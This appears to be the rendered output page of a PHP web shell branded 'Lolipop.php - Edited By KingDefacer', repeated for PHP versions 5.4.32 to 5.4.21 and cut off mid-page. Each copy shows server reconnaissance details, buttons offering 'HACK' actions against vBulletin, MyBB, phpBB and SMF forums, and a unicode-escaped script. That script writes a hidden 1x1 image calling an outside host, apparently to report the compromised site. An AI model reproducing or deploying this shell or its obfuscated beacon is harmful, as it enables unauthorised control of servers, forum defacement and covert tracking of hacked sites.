SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.32
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.32</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.31
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.31</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.30
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.30</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.29
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.29</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.28
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.28</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.27
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.27</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.26
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.26</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.25
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.25</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.24
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.24</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.23
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.23</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.22
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.22</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.21
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.21</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: 